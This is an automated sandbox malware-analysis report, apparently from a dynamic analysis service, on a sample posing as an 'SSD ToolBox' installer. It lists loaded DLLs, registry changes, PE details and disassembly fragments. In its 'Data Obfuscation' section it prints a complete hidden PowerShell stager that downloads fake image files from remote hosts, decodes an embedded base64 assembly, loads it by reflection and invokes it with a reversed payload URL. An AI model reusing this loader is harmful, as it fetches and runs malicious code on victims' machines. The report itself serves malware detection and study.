                            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SSD ToolBox_is1
Source: soft.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: soft.exe Static file information: File size 4996096 > 1048576
Source: soft.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x23e000
Source: soft.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x223000
Source: soft.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: msvcp100.i386.pdb source: is-21QH6.tmp.12.dr
Source: Binary string: msvcr100.i386.pdb source: is-HP0G4.tmp.12.dr
Source: Binary string: wextract.pdb source: MnzBi21FK.exe, 0000000E.00000000.1827835811.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe, 0000000E.00000002.1849429216.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe.9.dr, UNIQ[1].file.9.dr
Source: Binary string: wextract.pdbGCTL source: MnzBi21FK.exe, 0000000E.00000000.1827835811.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe, 0000000E.00000002.1849429216.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe.9.dr, UNIQ[1].file.9.dr
Source: Binary string: BitLockerToGo.pdb source: soft.exe, 00000005.00000002.1724312184.000000000A004000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: soft.exe, 00000005.00000002.1724312184.000000000A004000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe Unpacked PE file: 13.2.ssdtoolbox.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe Unpacked PE file: 13.2.ssdtoolbox.exe.400000.0.unpack
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $dosigo = '...'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '...'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
Source: MnzBi21FK.exe.9.dr Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_00450334
Source: soft.exe Static PE information: section name: .symtab
Source: is-PEPS4.tmp.12.dr Static PE information: section name: /4
Source: is-PEPS4.tmp.12.dr Static PE information: section name: /19
Source: is-PEPS4.tmp.12.dr Static PE information: section name: /35
Source: is-PEPS4.tmp.12.dr Static PE information: section name: /51
Source: is-PEPS4.tmp.12.dr Static PE information: section name: /63
Source: is-PEPS4.tmp.12.dr Static PE information: section name: /77
Source: is-PEPS4.tmp.12.dr Static PE information: section name: /89
Source: is-PEPS4.tmp.12.dr Static PE information: section name: /102
Source: is-PEPS4.tmp.12.dr Static PE information: section name: /113
Source: is-PEPS4.tmp.12.dr Static PE information: section name: /124
Source: sqlite3.dll.13.dr Static PE information: section name: /4
Source: sqlite3.dll.13.dr Static PE information: section name: /19
Source: sqlite3.dll.13.dr Static PE information: section name: /35
Source: sqlite3.dll.13.dr Static PE information: section name: /51
Source: sqlite3.dll.13.dr Static PE information: section name: /63
Source: sqlite3.dll.13.dr Static PE information: section name: /77
Source: sqlite3.dll.13.dr Static PE information: section name: /89
Source: sqlite3.dll.13.dr Static PE information: section name: /102
Source: sqlite3.dll.13.dr Static PE information: section name: /113
Source: sqlite3.dll.13.dr Static PE information: section name: /124
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_004065C8 push 00406605h; ret 11_2_004065FD
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_004040B5 push eax; ret 11_2_004040F1
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_00408104 push ecx; mov dword ptr [esp], eax 11_2_00408109
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_00404185 push 00404391h; ret 11_2_00404389
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_00404206 push 00404391h; ret 11_2_00404389
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_0040C218 push eax; ret 11_2_0040C219
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_004042E8 push 00404391h; ret 11_2_00404389
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_00404283 push 00404391h; ret 11_2_00404389
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_00408F38 push 00408F6Bh; ret 11_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_004849F4 push 00484B02h; ret 12_2_00484AFA
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_0040995C push 00409999h; ret 12_2_00409991
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_00458060 push 00458098h; ret 12_2_00458090
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_004860E4 push ecx; mov dword ptr [esp], ecx 12_2_004860E9
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_004062C4 push ecx; mov dword ptr [esp], eax 12_2_004062C5
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_004783C8 push ecx; mov dword ptr [esp], edx 12_2_004783C9
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_004104F0 push ecx; mov dword ptr [esp], edx 12_2_004104F5
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_00412938 push 0041299Bh; ret 12_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_0049AD44 pushad ; retf 12_2_0049AD53
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_0040CE48 push ecx; mov dword ptr [esp], edx 12_2_0040CE4A
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_00459378 push 004593BCh; ret 12_2_004593B4
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_0040F3A8 push ecx; mov dword ptr [esp], edx 12_2_0040F3AA
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_0040546D push eax; ret 12_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_004434B4 push ecx; mov dword ptr [esp], ecx 12_2_004434B8
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_0040553D push 00405749h; ret 12_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_004055BE push 00405749h; ret 12_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_0040563B push 00405749h; ret 12_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_004056A0 push 00405749h; ret 12_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_0045186C push 0045189Fh; ret 12_2_00451897
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_00451A30 push ecx; mov dword ptr [esp], eax 12_2_00451A35
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_00495BE4 push ecx; mov dword ptr [esp], ecx 12_2_00495BE9
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_00419C38 push ecx; mov dword ptr [esp], ecx 12_2_00419C3D
Source: is-HP0G4.tmp.12.dr Static PE information: section name: .text entropy: 6.90903234258047

                            Persistence and Installation Behavior

